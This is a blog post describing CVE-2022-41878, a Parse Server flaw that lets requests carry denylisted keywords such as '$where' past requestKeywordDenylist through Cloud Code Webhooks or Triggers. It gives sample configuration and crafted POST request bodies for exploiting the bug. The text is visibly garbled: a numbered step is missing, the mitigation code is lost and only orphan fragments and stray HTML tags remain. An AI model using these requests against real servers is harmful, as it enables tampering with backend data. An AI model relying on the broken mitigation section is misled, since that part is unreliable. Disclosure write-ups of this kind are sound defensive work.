CVE-2022-41878 - How Injected Keywords Bypass Parse Server Denylist (with Exploit Guide)

Parse Server is a popular, open-source backend framework built with Node.js. Developers love it for its ease of use, flexibility, and plug-and-play nature across infrastructures. But sometimes even powerful tools have security slip-ups. One such bug, CVE-2022-41878, allows clever attackers to sneak restricted keywords past a server's protections.

In this post, we'll break down what CVE-2022-41878 is, why it matters, how attackers can exploit it, and what you can do to stay safe—even if you can't upgrade right now.

What Is CVE-2022-41878?

Short version:  
Certain versions of Parse Server—specifically before 5.3.2 or 4.10.19—have a flaw. The parameter requestKeywordDenylist is supposed to block unwanted keywords (like $where or __system) from getting into your database. However, this protection can be bypassed with carefully crafted requests via Cloud Code Webhooks or Triggers. This means a malicious user can inject forbidden keywords, possibly compromising your backend logic, bypassing restrictions, or worse.

Official Advisory:  
- GitHub Security Advisory (GHSA-25j2-8xhh-2wj4)
- NVD Entry (CVE-2022-41878)

How The Vulnerability Works

A core feature of Parse Server is the Cloud Code functionality. It lets you execute JavaScript functions on your server, triggered by client events. These can be accessed via Webhooks (HTTP calls) or Triggers (like "beforeSave" or "afterDelete").

Usually, the requestKeywordDenylist option is set in your server configuration

// parse-server index.js snippet
const server = new ParseServer({
  // ... other options ...
  requestKeywordDenylist: ["$where", "__system", "password"]
});

The idea is: if a client request includes any of these keywords, it's rejected.

The Problem:
If a request comes through a Cloud Code Webhook or Trigger, that denylist is *not* enforced. This gives attackers a backdoor:

Exploitation Example (Step-by-Step)

Let's see how simple this can be. For our scenario, imagine you're running Parse Server 4.10.18 (an affected version), with a denylist blocking "$where".

1. Set up the Denylist

// index.js (Parse Server startup)
const server = new ParseServer({
  databaseURI: "mongodb://localhost:27017/mydb",
  appId: "myAppId",
  masterKey: "myMasterKey",
  requestKeywordDenylist: ["$where"]
});

Suppose you have a trigger like this

// cloud/main.js
Parse.Cloud.beforeSave("TargetClass", (request) => {
  // Do some business logic...
  // Save request.object (the incoming data)
});

3. Craft The Malicious Request

Usually, if a client tries to send {"$where": "this.value > 10"} directly, Parse rejects the request.

But let's say an attacker figures out your webhook endpoint and makes a Cloud Code Webhook call containing the forbidden key as a parameter. Something like:

POST /cloud-code/yourWebhookFunction
{
  "params": {
    "$where": "this.value > 10",
    "otherField": 42
  }
}

Or via a crafted beforeSave request that hits the trigger

POST /classes/TargetClass
{
  "otherField": 42,
  "$where": "this.value > 10"
}

The code in the trigger doesn't sanitize or block $where. The object gets updated as normal, and so the forbidden key makes it into your database—bypassing your denylist!

> ⚠️ This can let attackers create objects or modify queries in ways you explicitly tried to prevent.

Why Is This Dangerous?

- Bypassing Security: Attackers can write restricted fields (__system, $where, etc.) to your database.

Data Corruption: Malicious data may break app logic or crash clients.

- Potential Injection: If your app later uses these fields unchecked, it may be vulnerable to further injections or logic bugs.

The maintainers patched this bug. Upgrade ASAP!

> Parse Server Releases

Firewall Your Webhooks

Only allow trusted servers to contact your Cloud Code Webhook endpoint. Use allow/deny rules.

});

// proceed as normal
 });
 <br><br>---<br><br>## Wrapping Up<br><br>CVE-2022-41878 is a good example of how security boundaries often depend on *where* and *how* a request enters your system. Sometimes, simple configs like requestKeywordDenylist` aren't enforced everywhere, letting attackers find surprising side doors.

Patch up:  
- Upgrade if you can.  
- Block or protect your Cloud Code Webhooks.

Stay aware and check your Cloud Code for possible edge cases!

---

Further Reading:

- Parse Server GitHub Security Advisory
- CVE-2022-41878 on NVD
- Parse Server Documentation

*Want more exclusive security deep-dives? Drop a comment!*

Timeline

Published on: 11/10/2022 23:15:00 UTC
Last modified on: 11/15/2022 20:00:00 UTC